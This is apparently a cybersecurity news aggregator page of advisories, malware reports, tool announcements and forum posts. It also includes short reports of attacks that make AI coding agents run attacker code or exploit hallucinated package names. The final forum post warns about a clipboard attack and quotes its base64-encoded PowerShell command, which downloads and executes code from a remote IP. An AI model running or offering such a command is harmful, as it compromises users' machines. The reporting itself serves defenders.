Overview PayRange is a mobile payment app that allows users to pay for vending machines, laundromats, and other unattended machines using a smartphone with Bluetooth. Two vulnerabilities were discovered in version 7.0.7 of the PayRange app that is available in the Google Play store. Description A vulnerability (CVE-2026-13462) exists in the PayRange Android app that causes invalid SSL certificates to be accepted in application WebViews. A second vulnerability (CVE-2026-13461) exists that allows the injection of JavaScript, which can be used to escape the WebView sandbox and perform a number of dangerous actions on the user's device. These vulnerabilities were discovered in version 7.0.7 of the PayRange app. The PayRange app bypasses Android's SSL trust chain and accepts certificates that match any of the following rules (including self-signed certificates): Common Name ends with "payrange.com" Common Name contains "stripe.com" Common Name contains "fetlifestatus.com" AND any of these conditions are true: Issuer Common Name is "R10" Issuer Common Name is "R3" Issuer Common Name contains "Network Solutions" The attack vector is an on-path interception. If an attacker can direct traffic intended for a legitimate server to a device they control, they can negotiate a TLS connection with the user's device using any trusted certificate that matches the rule set. They are then able to inject content into the WebView and harvest credentials, issue malicious requests and read data entered by the user, including exchanges with the PayRange and Stripe servers. Impact An attacker may be able to intercept any information they can convince the
Cybersecurity News and Vulnerability Aggregator
Cybersecurity news aggregator
treemd <(curl -sL https://allsec.sh/md) (as Markdown) Top Cybersecurity Stories Today
VU#849433: Adalo Database API Enables Cross-App User Data Extraction via Over-Fetching and Missing Authorization Controls
Overview Adalo’s no‑code application platform exposes complete user records through its database API for all applications built on both V1 and V2. Due to a platform-level flaw, authenticated users can retrieve full user data belonging to any Adalo application, regardless of configuration. This issue affects more than one million applications and placing developers and their end users at risk of data exposure that they cannot prevent or remediate. Description Adalo is a Software-as-a-Service (SaaS) provider for building no-code applications. In theory, each application or tenant (customer) is logically isolated with separate databases, users, and configurations. CVE-2026-10706 Unrestricted Disclosure of Full User Records The Adalo database API contains a flaw which allows the backend to return complete user records for every list component request, regardless of which fields the component is configured to display. The database does not enforce ownership‑aware, server‑side authorization checks, allowing authenticated users of any Adalo application to query database and table identifiers belonging to other applications and retrieve full records, including fields not requested. This issue is amplified by the permissive CORS policy, plaintext storage of all text files and evidence suggests that deleted records may remain accessible. CVE-2026-10708 Exposure and Reuse of Long-Lived JWT Tokens The JWT tokens are visible in client‑side requests and remain valid for approximately twenty days. Once copied, they can be reused from any external website or script to query the database API directly. Because the platform allows requests from any origin, attackers can repeatedly query the API and extract large volumes of user data without interacting with the applica
Latest
Hi all! =) I built a small Python CLI that parses a folder of Sigma rules, extracts ATT&CK technique IDs (from attack.* tags, raw T-IDs, or attack.mitre.org URLs in references), and maps them onto the MITRE ATT&CK Enterprise matrix to show your coverage and gaps. Why another coverage tool? Fair question. Tbh sigma2attack and DeTT&CT exist and are great, they just dind't fit what i had in mind. What attack-mapper does differently: - **ATT&CK v19 native.** Ships a compact DB built from the current STIX bundle, so Stealth (TA0005) and Defense Impairment (TA0112) are already there. Revoked/deprecated techniques are filtered out, so the denominator matches the official matrix (15 tactics, 222 techniques, 475 sub-techniques). A scheduled GitHub Action rebuilds the DB monthly and fails when MITRE ships an update. - **CI gate.** Non-zero exit when no rule maps you can drop it into your detection repo's pipeline as a Detection-as-Code quality gate. - **Self-contained HTML reports** (4 styles, including a print-ready one with the canonical vertical matrix layout and sub-techniques nested under parents), plus JSON output, an SVG badge, and one-click ATT&CK Navigator layer export. - **Scope filters** — `--include` / `--ignore` by technique ID, tactic shortname, or TA id. - Pure Python + PyYAML, fully offline at runtime. Repo: https://github.com/JoseArgento/attack-mapper Install: `pip install attack-mapper` ([PyPI](https://pypi.org/project/attack-mapper/)) It's a young project (I built it partly to learn detection engineering coming from a QA automation background, so the test suite is where I put the love). It's also part of my thesis work for the cybersecurity degree that I'm pursuing so Feedback, issues, and brutal honesty very welcome. English is not my first language, so apologies if anything isn't clear enough, happy to clarify! =)
Researchers at Ledger's Donjon security team have shown that a precisely timed laser pulse, aimed at the chip inside a Tangem crypto wallet card, can reset the card's password to anything the attacker picks. No old password. No backup card. Once it is reset, whoever did it controls the wallet and can move the coins out. This is not an emergency for most owners. The attack needs
Details have emerged about three now-patched security flaws in the OpenClaw personal artificial intelligence (AI) assistant that, if successfully exploited, could enable credential theft, privilege escalation, and arbitrary code execution on the host. A brief description of the high-severity vulnerabilities is as follows - GHSA-hjr6-g723-hmfm (CVSS score: 8.8) - An operating system
Every week, CISA adds newly exploited vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. For security teams, that usually means the same routine all over again: look up the CVE, understand what it does, write a Sigma rule, notify the SOC, and document everything. It's repetitive work, and depending on the vulnerability, it can easily take several hours. I wanted to see if that entire process could be automated. The workflow starts with n8n, which checks the CISA KEV catalog every week for new entries. When a new vulnerability appears, it collects the important details like the vendor, affected product, and vulnerability description. Instead of manually analyzing that information, the workflow sends it to Google Gemini with a specific role: act like an experienced SOC detection engineer and generate a production-ready Sigma rule in YAML format. The goal isn't just to create a rule, but to produce something that's immediately useful to defenders. Once the rule is ready, the rest of the process takes care of itself. A Slack message is sent to the security team, the week's findings are included in an email report, and everything is logged in a Google Sheet for future reference. The result is simple. A process that once required 4 to 6 hours of manual work for every new vulnerability now runs automatically with almost no human intervention. That gives analysts more time to focus on investigating threats instead of repeating the same research and documentation process every week. **Full Documentation is on my** [Github](https://github.com/manishrawat21/Cisa-KEV-Threat-Intel-Orchestrator)
The China-linked cybercrime group known as Silver Fox has been attributed to a new Rust-based remote access trojan (RAR) called MODBEACON. Chinese cybersecurity company QiAnXin said that while the threat cluster may appear like a low-sophistication, high-activity operation that propagates malware via counterfeit installers using SEO poisoning techniques, it belies their true organizational
There are several major managed detection and response (MDR) companies to choose from. We’ve compared the main offerings of the best MDR providers to help you decide which is right for your organisation. Maybe it was a near miss, or a security team stretched too thin and drowning in alerts from dozens of tools. Whatever […] The post Top 6 Managed Detection and Response Providers appeared first on Heimdal Security Blog .
Cyber Threat Intelligence (CTI) has traditionally attributed attacks through Tactics, Techniques and Procedures (TTPs). In this paper we evaluate whether that assumption still holds when AI agents are explicitly configured to emulate known threat groups. We configured AI agents to reproduce the behavior of APT28, APT29, APT41, APT44 and Lazarus inside enterprise and military cyber ranges. Our results suggest that sufficiently capable AI agents can reproduce TTP patterns closely enough to make attribution based solely on behavioral evidence significantly more difficult. We'd be interested in feedback from practitioners working on CTI, attribution or adversary emulation.
Cyber Threat Intelligence (CTI) has traditionally attributed attacks through Tactics, Techniques and Procedures (TTPs). In this paper we evaluate whether that assumption still holds when AI agents are explicitly configured to emulate known threat groups. We configured AI agents to reproduce the behavior of APT28, APT29, APT41, APT44 and Lazarus inside enterprise and military cyber ranges. Our results suggest that sufficiently capable AI agents can reproduce TTP patterns closely enough to make attribution based solely on behavioral evidence significantly more difficult. We'd be interested in feedback from practitioners working on CTI, attribution or adversary emulation.
A single wrong variable on one line in XQUIC, Alibaba's QUIC and HTTP/3 library, lets any remote client crash the server with a short burst of completely legal traffic. There is no patch. FoxIO researcher Sébastien Féry disclosed the flaw on July 8 and nicknamed it XRING. He says it needs no login and no malformed packets: about 260 bytes of ordinary QPACK traffic takes the server
Most enterprises assume their asset inventory is close enough to accurate. The evidence suggests otherwise. According to a survey of over 600 security leaders in the 2026 Axonius Actionability Report, only 45% of organizations consolidate their asset and exposure data into a single view, and every downstream security program inherits whatever the inventory gets wrong. Lumen Technologies, a
A cybercrime crew left one of its own servers wide open on the internet for three weeks, and it exposed the operation's inner workings: the hacking tools, the activity logs, and target lists naming more than 1.4 million websites. Far fewer were actually broken into, but the exposed files showed researchers how a mass site-hacking operation runs from the inside. The operation, now tracked as
I reverse-engineered the DJI Spark smart battery I2C/SMBus protocol and documented the captures, firmware, and hardware
Researchers ran 281 of the most popular free VPN apps on the Google Play Store through a new testing system and found that many fail at the basics people install a VPN for, i.e., keeping their traffic private and secure. The apps flagged with at least one problem have been installed more than 2.4 billion times. The problems are basic, not sophisticated. 29 apps let user traffic leak outside
A threat actor has been targeting organizations spanning multiple sectors with voice-based fake security requests that prompt Microsoft 365 users to enroll a new Entra passkey with an aim to carry out data extortion attacks. The threat actor, tracked by Okta under the moniker O-UNC-066, has deployed a panel-controlled phishing kit that's capable of targeting the passkey enrollment process. The
Google has flagged the widely-installed HTTP header editor ModHeader as malware Microsoft already pulled it from Edge on July 3. [MalExt Sentry - Malicious Browser Extension Tracker](https://malext.io/?q=ModHeader) * 900k installs on chrome | idgpnmonknjnojddfkpgkljpfnnfcklj * 700k installs on edge | opgbiafapkbbnbnjcdomjaghbckfkglc
Researchers from Tel Aviv University, Technion, and Intuit have detailed a new attack technique dubbed ‘HalluSquatting’ that turns AI assistants’ tendency to hallucinate into a scalable infection vector.
Security firm Coinspect has disclosed a crypto wallet flaw it calls Ill Bloom, and attackers are already using it. The flaw is in how some wallet software generated its recovery phrase, the words that control the money. When that phrase is made with weak randomness, an attacker can work it out and take everything it controls. The firm has confirmed one coordinated sweep on May 27
A 41-year-old former ransomware negotiator has been sentenced to nearly six years (i.e., 70 months) in prison in the U.S. for their role in conspiring with the now-defunct BlackCat ransomware operators to extort multiple victims and working with two other cybersecurity professionals to target additional victims in 2023. In a sentencing memorandum, federal prosecutors described Martino as a "
A patch Microsoft released on Wednesday to fix a zero-day vulnerability in its Defender security engine may cause Windows machines to write files large enough to completely consume available disk space, the researcher who discovered the flaw said.
Datadog Security Labs is warning of "several overlapping campaigns" that are systematically enumerating corporate GitHub organizations, repositories, and user accounts through the GitHub API. "Operators rely on automated scraping tooling with custom or legitimate-sounding user agents, leveraging GitHub 'ghost' accounts that are often years old, or compromised OAuth tokens and personal
Security testing identifies vulnerabilities, weaknesses, and misconfigurations before attackers can exploit them. This guide covers every major method, when to use each, and how to build a program that finds what actually matters. The post What Is Security Testing? A Practitioner’s Guide to Methods, Tools, and When to Use Each appeared first on Synack .
Microsoft has taken apart a destructive Windows backdoor it calls GigaWiper. What stands out is how it is built: not one tool but three older destructive programs bolted into one, offered as commands the operator can choose from. Each is a different way to break a machine: wipe the whole disk, overwrite the Windows drive, or run fake "ransomware" that scrambles files with a key it never saves
Overview PayRange is a mobile payment app that allows users to pay for vending machines, laundromats, and other unattended machines using a smartphone with Bluetooth. Two vulnerabilities were discovered in version 7.0.7 of the PayRange app that is available in the Google Play store. Description A vulnerability (CVE-2026-13462) exists in the PayRange Android app that causes invalid SSL certificates to be accepted in application WebViews. A second vulnerability (CVE-2026-13461) exists that allows the injection of JavaScript, which can be used to escape the WebView sandbox and perform a number of dangerous actions on the user's device. These vulnerabilities were discovered in version 7.0.7 of the PayRange app. The PayRange app bypasses Android's SSL trust chain and accepts certificates that match any of the following rules (including self-signed certificates): Common Name ends with "payrange.com" Common Name contains "stripe.com" Common Name contains "fetlifestatus.com" AND any of these conditions are true: Issuer Common Name is "R10" Issuer Common Name is "R3" Issuer Common Name contains "Network Solutions" The attack vector is an on-path interception. If an attacker can direct traffic intended for a legitimate server to a device they control, they can negotiate a TLS connection with the user's device using any trusted certificate that matches the rule set. They are then able to inject content into the WebView and harvest credentials, issue malicious requests and read data entered by the user, including exchanges with the PayRange and Stripe servers. Impact An attacker may be able to intercept any information they can convince the
GitHub has officially announced the release of npm version 12 with install scripts disabled by default, along with deprecating granular access tokens (GATs) designed to bypass two-factor authentication (2FA). The Microsoft-owned subsidiary noted that the following npm install behaviors that used to run automatically before have been made opt-in - allowScripts defaults to off, meaning
Hi everyone, I've recently released **Auditor 1.0.0**, a command-line utility for file hashing and integrity verification, and I'd like to share some of the new features that may be useful for digital forensics workflows. # New: Verified file copy Two new commands have been added to perform file copies while ensuring end-to-end integrity. **clone** * Reads each source file and computes its hash. * Copies the file to the destination. * Reads the copied file, recomputes its hash, and verifies it against the source. * Can also generate audit/hash files if they don't already exist. **chkcopy** Similar to `clone`, but additionally validates the source against previously generated audit files before copying: * Verifies that the audit files exist. * Recomputes the source hash and compares it with the recorded value. * Copies the file. * Verifies the copied file by hashing it again and comparing it with the source. Both commands support configurable retry logic (number of attempts and delay between retries), which is particularly useful when copying over network shares where transient I/O or connection failures may occur. # Compatibility with existing checksum tools Auditor can now verify checksum files generated by other utilities, including: * `fsum` * `sha256sum` * `b3sum` * and others This makes it easier to integrate Auditor into existing workflows without requiring proprietary hash lists. # Multiple hash encodings Besides the traditional hexadecimal (Base16) representation, Auditor now supports: * Base32 * Base64 * Base85 This is handy when working with systems that exchange hashes in different encodings (for example, some forensic monitoring systems that use Base32). # Windows, Linux and macOS Precompiled binaries are available for Windows, Linux and macOS. The Linux build has also been updated to run cleanly under **WSL (Windows Subsystem for Linux)**, which may be useful for investigators who automate their workflow with Linux shell scripts while working on Windows. Documentation and downloads: [https://thash.org/auditor](https://thash.org/auditor) # Breaking change in v1.0.0 The default behavior has changed. Previous versions enabled the **thash** method by default. Starting with **v1.0.0**, Auditor computes standard hashes by default, producing exactly the same values as tools such as `sha256sum`, `b3sum`, and `fsum`. The **thash** algorithm is still available, but it must now be explicitly enabled with: `-t` or `--thash` This change was made to improve interoperability while keeping thash available for situations where faster integrity verification of very large datasets is desirable. Feedback, bug reports and feature suggestions are always welcome.
Most security mess starts as admin work. A link gets clicked. A tool gets trusted. A bucket name gets reused. A setting stays loose because nobody wants to touch it. This week is full of that kind of damage. Not loud. Not clever. Just small gaps doing big jobs. The worst part is how normal it all looks until the bill arrives. The full ThreatsDay list is below. Global
A Majority of European Lawmakers Voted Against Letting Big Tech Read Our Messages. They’re Going to Anyway
Companies will once again be allowed to scan citizens’ personal texts, emails, and social media messages via the “Chat Control” bill to find child abuse material online.
Overview Two vulnerabilities have been discovered in Xerte Online Toolkits, an open-source e-learning authoring toolsuite intended for the creation of learning materials within a web browser. CVE-2026-14261 tracks the persistence of the /setup/ directory after installation, which allows an unauthenticated attacker to reconfigure the application to point to a remote database they control in order to gain administrative access. CVE-2026-12116 tracks an editable antivirus binary path that can be redirected to a PHP interpreter, causing uploaded files to be executed as PHP code and resulting in remote code execution (RCE). Version v3.15.5 or v3.14.6 of Xerte Online Toolkits fixes these vulnerabilities. Description Xerte Online Toolkits is a suite of a free, open-source e-learning authoring tools that allows users to make educational materials directly in-browser. The toolset is installed from multiple packages, and creates a setup folder that persists after installation. CVE-2026-14261 A vulnerability in Xerte Online Toolkits allows for authentication bypass and remote code execution via reinstallation through the /setup/ folder, enabling attackers to reinstall the service to a remote database they control. CVE-2026-12116 A vulnerability in Xerte Online Toolkits allows for RCE through the antivirus binary path in the tools server settings. The antivirus binary runs on all uploaded files, but the path to the binary can be modified using the configuration menu. An attacker can achieve remote code execution by redirecting the path to a PHP interpreter, causing any uploaded PHP scripts to be executed. During installation, Xerte creates a /setup/
Everyone seems to have announced a clearinghouse over the past few weeks. We did too. Ours is called Athena, and the main thing that sets it apart is that it was already real and running when we announced it — built quietly months earlier, heads down, taking findings and shipping fixes, because customers kept asking us to. We only announced it now because everyone else started announcing theirs,
Cybersecurity researchers have flagged a new ransomware family called GodDamn that employs the PoisonX kernel driver to neutralize security software as part of its defense evasion strategy. According to a new report published by the Threat Hunter Team from Symantec, the ransomware was first publicly spotted in the wild on May 21, 2026. It's assessed to be a rebrand of the Beast ransomware,
An MSG database tracked and categorized hundreds of celebs, famous Knicks superfans, and even some of Taylor Swift’s wedding guests. Labels included “LGBTQIA,” “DO NOT HOST,” and low to high “risk.”
Microsoft has released security updates for a Defender vulnerability known as RoguePlanet, nearly a month after details of the flaw became public. The vulnerability, tracked as CVE-2026-50656 (CVSS score: 7.8), is a privilege escalation issue in the Microsoft Malware Protection Engine ("mpengine.dll"), which provides scanning, detection, and cleaning capabilities for its antivirus and
Meta has announced that its new artificial intelligence (AI) model Muse Image lets people use public Instagram posts and reels to generate AI content, and it's enabled by default. "You can also @-mention Instagram accounts in the Meta AI app to bring specific Instagram profiles right into your images," the social media giant said in a post. "Whether you want to design a custom event invitation
Ask an AI coding agent to scan open-source code for security holes, and it might run the attacker's code on your own machine instead. That is the finding in a proof-of-concept published Wednesday by the AI Now Institute, an attack it calls "Friendly Fire." It works against Anthropic's Claude Code and OpenAI's Codex when either is running in an autonomous mode that approves its own
A malicious commit disguised as SDK telemetry briefly compromised @injectivelabs/sdk-ts, exfiltrating wallet mnemonics and private keys.
Our 2026 State of Vulnerabilities Report surfaces what Synack finds in tested customer environments. At a recent webinar, two of our most decorated researchers from the Synack Red Team describe the threat landscape they’re seeing beyond the report findings. Here's what the data shows, what practitioners have experienced, and what your security program should do about the gap. The post The 2026 State of Vulnerabilities: What the Data Misses, According to Our Red Team appeared first on Synack .
VU#849433: Adalo Database API Enables Cross-App User Data Extraction via Over-Fetching and Missing Authorization Controls
Overview Adalo’s no‑code application platform exposes complete user records through its database API for all applications built on both V1 and V2. Due to a platform-level flaw, authenticated users can retrieve full user data belonging to any Adalo application, regardless of configuration. This issue affects more than one million applications and placing developers and their end users at risk of data exposure that they cannot prevent or remediate. Description Adalo is a Software-as-a-Service (SaaS) provider for building no-code applications. In theory, each application or tenant (customer) is logically isolated with separate databases, users, and configurations. CVE-2026-10706 Unrestricted Disclosure of Full User Records The Adalo database API contains a flaw which allows the backend to return complete user records for every list component request, regardless of which fields the component is configured to display. The database does not enforce ownership‑aware, server‑side authorization checks, allowing authenticated users of any Adalo application to query database and table identifiers belonging to other applications and retrieve full records, including fields not requested. This issue is amplified by the permissive CORS policy, plaintext storage of all text files and evidence suggests that deleted records may remain accessible. CVE-2026-10708 Exposure and Reuse of Long-Lived JWT Tokens The JWT tokens are visible in client‑side requests and remain valid for approximately twenty days. Once copied, they can be reused from any external website or script to query the database API directly. Because the platform allows requests from any origin, attackers can repeatedly query the API and extract large volumes of user data without interacting with the applica
Presently sponsored by: Report URI: Guarding you from rogue JavaScript! Don’t get pwned; get real-time alerts & prevent breaches #SecureYourSite How's this for a location?! I mean, last week was nice with Scott in Mallorca, but Marrakech is, well, wow Anyway, about those data breaches... This week I'm talking about the futility of attempting to remove piss from a pool , yet here we are, with various companies wanting to place that message alongside the very data breaches they can do nothing about! As I say in the post, I don't question the good intentions behind setting up a service to try to scrub data from legally operating data brokers, but the marketing machines behind those organisations that regularly reach out to me for product placement don't really seem to grasp that reality. At least now they have a nice explainer courtesy of that post
A cybersecurity startup dangling millions of dollars to acquire zero-day security vulnerabilities in popular software is run by a pair of far-right conspiracy theorists and convicted felons whose most recent ventures included fake intelligence companies and a now-defunct AI-based lobbying platform they operated under assumed names. The X/Twitter account IRIS C2 (@C2IRIS) has gained more than 4,000 followers since its creation in January 2025, posting frequently about security vulnerabilities, AI and software exploits. IRIS C2 says it is a company in McLean, Va. that sells offensive cybersecurity capabilities. The IRIS C2 website dangles the possibility of million-dollar payouts for exploits to attract talent. “Our business model is this,” reads a pinned post on top of the IRIS C2 account on X. “Attract the very best vulnerability researchers and exploit developers in the world to join our company. This mostly revolves around junior engineers with raw talent/extremely high IQ. We don’t care if they have a college degree/industry experience.” The website linked in that profile — irisc2[.]com — says the company is hiring for a number of open positions, and a recent post on its LinkedIn page enthuses about an overwhelming number of appli
In April we released Mewt , our open-source mutation-testing engine that finds the gaps in your test suite. Today we’re expanding it with support for DAML, the language Canton Network applications are written in. Mewt now reads DAML, generates several classes of mutants (including two built for DAML’s authorization primitives), and runs them through your existing test suite to count how many mutants survive. If you want to try it, simply install Mewt from the repository , point a mewt.toml at your project and its test command, and use mewt run . For a team shipping DAML to production, that count is what a passing test run is actually worth: it puts a number on how much your suite checks, whereas a green run on its own does not. Why DAML’s coverage reports lie Test coverage is the most reassuring lie in smart-contract development. Hitting 100% line coverage tells you the test runner walked the code; it does not tell you whether any test would fail if that code stopped doing what it is supposed to. We have been grading test harnesses by how many mutants they kill since at least 2019 , and our primer on finding the bugs your tests don’t catch shows how a green suite can still miss the bug that matters. DAML’s built-in coverage measures execution at the template and choice level: which templates were created and which choices were exercised over the test run. It reports whether each ch
Scammers are hijacking government websites to upload ads for “leaked” OnlyFans content. Thousands of copyright complaints from adult creators are helping people avoid malicious links.
Burst water mains. Evacuated hospitals. In a closed-door simulation, insurers played out their response to a mass disruption by China’s Volt Typhoon hackers—and found a nightmare scenario.
Your client is no longer just buying your security advice. They’re auditing whether you live by it. That was a clear message from my exclusive interview with Heather MacDonald Alford, an MSP finance specialist and owner of Counting Creators. Heather’s exactly the kind of customer MSPs should be paying attention to. She’s informed, commercially minded, and willing to challenge vendors to […] The post Cyber-Aware Customers Are Raising the Bar for MSPs and Other Vendors appeared first on Heimdal Security Blog .
Advanced Loader Analysis: Module Stomping, CFG Bypass & COM Hijacking (Shellhost, amsi, mstscax, clbcatq)
Datadog Security Research has tracked multiple coordinated campaigns enumerating GitHub organizations, repositories, and users through the public GitHub API, abusing leaked access tokens, and cloning private repositories.
I have built NinjaDBG, a full-featured Linux debugger developed from scratch using C++ and Capstone, featuring anti-detection techniques and a polished CLI. Additionally, I created nyx, an ultra-lightweight and headless C decompiler similar to Ghidra written in C++20. Any support to continue the dev
Continuing our journey through Sentinel ingestion cost reduction, this part focuses on one of the most expensive log sources: firewalls, and more specifically, network traffic events. Network traffic logs from firewalls are highly voluminous and often become the largest contributor to data ingestion costs. At the same time, they remain a valuable source of information during Incident Response or while developing Threat Detection use cases, as they provide a centralized view of network activity across the environment. T
In this second part, we demonstrate how a Cyber Resilience Act (CRA) assessment is performed in practice. Using a low-cost IP camera as an example, we show how a product is classified, how threats are modelled, how hardware and firmware are analysed, and how compliance gaps against IEC 62443-4-2 can be identified. You may want visit the Cyber Resilience Act – Part I , where we also explored the legal landscape of CRA and discuss the shifting responsibilities for digital product manufacturers, establishing that CRA compliance is a fundamental requirement for market access in the EU. From Threats to Requirements Consider a common consumer product: a budget IP camera sourced via marketplaces such as Wish or Temu. The journey toward CRA readiness begins with defining the device’s attack surface through threat modelling for example using the STRIDE methodology, which categorizes threats into Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, and Elevation of Privilege. Threat modelling ensures that subsequent testing focuses on realistic attack scenarios and the security controls that matter most for the product, rather than relying on a generic checklist.
Overview In the first installment of this series , I walked through how I leveraged large language models to assist in identifying several vulnerabilities in the FreeBSD kernel, including a stack-based buffer overflow assigned CVE-2026-3038 . This raised a natural follow-up question. Can language models effectively write exploits for memory corruption vulnerabilities? This article explores that question. I’ll detail two exploit chains I developed that achieve a full escape from a FreeBSD jail environment. The first chain pairs a stack-based buffer overflow with a stack-based information leak to defeat both stack canaries and KASLR. The second takes a different path, combining a heap-based buf
New OST2 class: "Architecture 1901: From zero to QEMU - A Gentle introduction to emulators from the ground up!"
This free class by Antonio Nappa of Fuzz Society builds up your knowledge from learning a toy 8-bit CPU architecture all the way to understanding how QEMU can emulate that architecture. Using this knowledge you can then understand how QEMU can emulate any architecture! Based on beta testing, this class takes an average of 8h47m to complete, and a median of 7h26m.
The Office of Professional Responsibility has opened more than 100 cases over what ICE officials call “incidents of doxing and threats” against ICE employees.
Porting the functionality of dnscmd.exe into (slightly) more OPSEC safe Beacon Object Files (BOFs) so you can get domain admin rights when you manage to impersonate a user that is a member of the DnsAdmins group, or if using dnscmd.exe simply isn’t an option.
To reduce the amount of noise from questions, we have disabled self-posts in favor of a unified questions thread every week. Feel free to ask any question about reverse engineering here. If your question is about how to use a specific tool, or is specific to some particular target, you will have better luck on the [Reverse Engineering StackExchange](http://reverseengineering.stackexchange.com/). See also /r/AskReverseEngineering.
https://preview.redd.it/xfm8scpfyjbh1.png?width=1240&format=png&auto=webp&s=cc1fc0bbeaca4dfd7aee75951f8ec61070e262bf Sharing some lessons from a challenging forensic PCAP analysis: 1. Map the C2 protocol first. Understanding how the attacker communicates tells you what to expect in every packet. 2. Encryption keys aren't always what they look like. A hex string can be interpreted multiple ways — raw bytes, UTF‑8 encoding, even UTF‑16. If your decrypted output is garbage, ask yourself whether you're using the right form of the key. 3. Responses matter as much as requests. In encrypted C2 channels, the server sends back just as much intel as the attacker sends up. 4. Gzip inside base64 inside C# inside AES. It sounds absurd, but nesting is a real obfuscation pattern. 5. Check file‑creation side effects. Sometimes the payload writes a file you can use as a decryption key elsewhere. If you're getting into forensics CTFs, grab a PCAP with at least 4k packets and try to reconstruct the full timeline — it's a different beast from Jeopardy‑style challenges.
This post continues and concludes our series on Agent ID, by outlining steps that an administrator or security team can take to secure blueprints and agent identities created in their local Entra ID tenant.
Plus: Alleged Scattered Spider hacking member extradited, dozens of license plate reader errors, and Indian officials are concerned about WhatsApp’s username rollout.
https://be nrankwhence.com/preland/av/mc-af/6/index.html? Space added to make the link invalid. 0/10, don't recommend navigating to that website.
Our latest McAfee Labs research exposes a browser extension campaign that poses as a harmless note-taking tool while silently hijacking crypto transactions. The malware tampers with Chrome/Edge/Brave’s trust mechanisms to install without consent, resolves its command-and-control server via a blockchain smart contract (EtherHiding) to evade takedown, and swaps copied wallet addresses with attacker-controlled ones across BTC, ETH, XRP, BCH, and DASH — turning a routine copy-paste into an irreversible loss. Full technical breakdown and IOCs inside
[they are getting smarter](https://preview.redd.it/d40lwwsmv1bh1.png?width=1407&format=png&auto=webp&s=deb513ded2423277ed3a8437e1d3763dc138d62c) this is what the script copied to my clipboard. funny that this website was opened for the first time, yet chrome gave it clipboard permission. lol iex(\[Text.Encoding\]::ASCII.GetString(\[Convert\]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgJ2h0dHA6Ly8xNjYuMS44OS45MS9fLycgLVVzZUJhc2ljUGFyc2luZyB8IEludm9rZS1FeHByZXNzaW9u')))